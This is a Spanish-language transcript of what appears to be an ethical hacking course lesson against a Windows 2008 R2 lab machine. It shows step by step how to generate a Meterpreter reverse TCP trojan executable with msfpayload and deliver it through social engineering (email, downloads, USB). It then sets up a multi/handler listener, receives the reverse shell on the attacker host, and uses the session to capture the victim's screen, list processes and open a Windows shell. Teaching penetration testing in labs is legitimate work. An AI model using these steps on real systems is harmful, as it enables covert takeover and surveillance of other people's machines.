Vamos a realizar una prueba de concepto donde vamos a atacar una máquina Windows 2008 Server R2 de 64 bits. ¿Qué vamos a hacer? Vamos a invocar nuestro Metasploit. Vamos a usar en una consola del Kali MSF Console y cargamos el Metasploit. Vamos a esperar un momento que cargue. Ya hemos iniciado nuestro Metasploit. Voy a borrar un poco acá la pantalla. Perfecto. Vamos a hacer un ataque un poco diferente al anterior que realizamos con 2003. Con ese lo hicimos de forma remota, sin interactuar con la máquina. En este vamos a hacer un cambio para variar. Vamos a crear un archivo que va a ser necesario ejecutar en la máquina Windows 2008 de 64 bits para poder nosotros tomar control de ella. Vamos a utilizar una nueva herramienta. Vamos a abrir una consola por acá. Vamos a mejorar un poco el tamaño. Listo. Y aquí vamos a utilizar otro parámetro de Metasploit que se llama MSF Payload. Un payload, como recordamos, es lo que se va a ejecutar una vez la explotación tenga efecto. En este caso vamos a crear un payload en un archivo ejecutable. ¿Cómo lo vamos a realizar? Vamos a escribir MSF Payload espacio. Vamos a usar el mismo Meterpreter que habíamos utilizado anteriormente para que veamos otra aplicación. Vamos a decirle Windows / Meterpreter / reverse _ tcp. Vamos a darle un espacio y ahora tenemos que configurar las opciones. Recuerden que en el anterior uso del Metasploit configurábamos cada una de las opciones con la variable set. Al utilizar MSF Payload no necesitamos hacer eso. Lo que debemos hacer es alimentarle en la misma cadena, en el mismo string, todos los parámetros que queremos usar. ¿Cómo lo vamos a hacer? Simplemente yo le doy un espacio y le digo lhost, por ejemplo, lo doy en mayúscula para mejorar el entendimiento, que sea más claro. Lhost igual, y aquí voy a colocar la IP de mi backtrack. Ok, entonces miremos cuál es la IP de mi backtrack. ifconfig. Muy bien, 172.16.136.203. La copio. Vamos acá y pongo la IP. Ya está. Damos un espacio y vamos a configurar el siguiente parámetro, que es el puerto local, el puerto donde vamos a escuchar. Recordemos que con Meterpreter lo que hacemos, voy a tratar de aumentar el tamaño de la pantalla, ya está. Lo que hacemos es invocar desde la máquina víctima la conexión hacia la máquina atacante. Por eso necesitamos el puerto local donde vamos a escuchar. En este caso voy a crear el port, le doy 2 puntos y vamos a escuchar en el 5555. Damos un espacio y voy a indicarle que ya terminé la edición y que quiero inyectarlo en un archivo ejecutable. Entonces utilizo X mayúscula, espacio, mayor que, y vamos a darle una ruta para grabarlo dentro de nuestro backtrack. Voy a decirle /root /desktop, tiene que ser una ruta que exista en mi backtrack, / lo voy a llamar ethicalbeer.exe. Presiono enter y si todos los parámetros están correctos, él me va a generar un archivo ejecutable con la parametrización que yo le di. Perfecto. Aquí nos dice que creó el payload en Windows Meterpreter Reverse TCP con un tamaño de 290 bytes con las opciones lhost y lport. Si visualizo en mi máquina, vamos a abrir un poco el computador, vamos a mirar dentro del root, vamos a mirar en el file system, root, en el escritorio, aquí está, ethicalbeer.exe. Debemos tener en cuenta que este es el archivo que por medio de ingeniería social, un correo electrónico, hacer que la persona lo descargue de una página web, hacer que se lo entreguen en una USB, etcétera, debemos colocar este archivo en el Windows 2008 R2 de 64.
Entonces, esa es la forma de hacerlo. Tenemos ya nuestra máquina virtual preparada, una máquina Windows 2008 para este efecto. Entonces, ya hemos llevado el archivo EthicalVir a esta máquina. Lo que me resta aquí es configurar la escucha local en mi backtrack, esperando a que se ejecute el virus en la máquina remota. Podemos hablar de que es un troyano. Entonces, ¿qué vamos a hacer? Vamos a ir a nuestro Metasploit. Vamos a borrar acá. Tenemos acá nuestro Metasploit y vamos a configurarlo. Podemos decirle que utilice un exploit de manejo múltiple, que maneje múltiples sesiones. Por ejemplo, use espacio exploit espacio /multi /handler. Presionamos enter. Ya como ven, el prompt ha cambiado al exploit que quiero utilizar. Vamos a decirle los parámetros. Puedo decirle show options. Voy a configurar un payload. Como ven, es un exploit que es muy maleable, muy moldeable para lo que necesitemos. En este caso simplemente voy a ejecutar un payload conjuntamente con él para quedar a la escucha esperando que la máquina 2008 ejecute el troyano que hemos enviado. Entonces, ¿qué vamos a colocar acá? Vamos a colocar el payload. Le voy a decir set payload espacio Windows / meterpreter. Si no sabemos bien la escritura, puedo dar tabulador y él me va a presentar las alternativas. Windows, perdón, aquí me falta una S, Windows meterpreter. Perfecto, ya él lo tomó con tabulador. Reverse. Y yo puedo darle tabulador para que me muestre las alternativas después de reverse. Aquí vemos HTTP, HTTPS, etcétera. Hay una gran cantidad. Reverse TCP. Nosotros también dictamos un curso específico a nivel de Metasploit, que es bastante interesante en un futuro para cuando ustedes ya hayan realizado el curso de Ethical Hacking. Una alternativa muy interesante es el curso de profundización a nivel de Linux Backtrack y Metasploit. Muy bien, ya vemos que el payload es Windows Meterpreter Reverse TCP. Voy a limpiar un poco la pantalla. Listo. Entonces aquí vamos a decirle la configuración que vamos a utilizar. ¿Qué configuración va a ser esa? ¿Cuál es la IP que va a escuchar y cuál es el puerto? Le vamos a decir set lhost y aquí va a ir la IP del backtrack que tenemos acá. Set lhost, ya la tomó, como podemos ver acá, y set lport. Y como recordarán, en el archivo que creamos para infectar la máquina 2008 R2, creamos el puerto 5555. Perfecto. Listo. Lo único que nos resta es ejecutar el exploit por medio de exploits y quedar a la escucha esperando que en la máquina virtual se ejecute el archivo. Vamos a traer nuestra máquina virtual 2008, donde ya tenemos el archivo EthicalVir. Aquí lo tenemos. Y simplemente lo vamos a ejecutar. Al ejecutarlo, como ustedes pueden observar, en el backtrack se comienza la sesión de forma automática. Ya aquí nos dice que se inició la sesión 1 por el puerto 5555 contra la máquina 172.16.136.159. Aquí podemos ver ya la sesión de Meterpreter abierta. Podemos ejecutar varios comandos. Ya conocimos algunos de Meterpreter. Vamos a ver otros. Uno muy interesante, por ejemplo, es la opción Screenshot. Yo puedo traerme una pantalla de la máquina y ver qué está visualizando el usuario en ese momento del servidor. Entonces yo le puedo decir Screenshot, presiono Enter y él me va a crear un archivo que ha grabado dentro de root con este nombre. Vamos a visualizarlo, vamos a abrir la carpeta donde está ubicado. Vamos a buscar dentro del file system root y aquí está. Vamos a visualizarlo. Ahí está. Como ven, esa es la imagen que tiene la máquina virtual, exactamente esa. Vamos a traer un instante la máquina virtual. Aquí tenemos la máquina virtual para que podamos comparar. Como ven, exactamente la misma pantalla. Ahí está. Entonces,
es supremamente útil porque podemos visualizar qué están haciendo, qué está viendo la persona que esté trabajando en el servidor. Vamos a continuar acá. Miremos un par de comandos adicionales que podamos ejecutar acá. Tenemos, por ejemplo, el comando ps, que ya sabemos nos permite ver los procesos sin ningún inconveniente. Y bueno, ¿por qué no tomar un shell de la máquina? Con el comando shell puedo llegar a un shell de Windows. Como vemos, ya estamos allí. Ya estamos dentro de la máquina, podemos recorrer toda su estructura de directorios, irnos por ejemplo a la raíz de Windows, podemos dar un dir, entrar al System 32 por ejemplo, etc. Como vemos, la máquina nos pertenece. Esta es una de las formas que tenemos para poder hacer una explotación de un Windows 2008 R2, tanto versión 32 bits como 64 bits.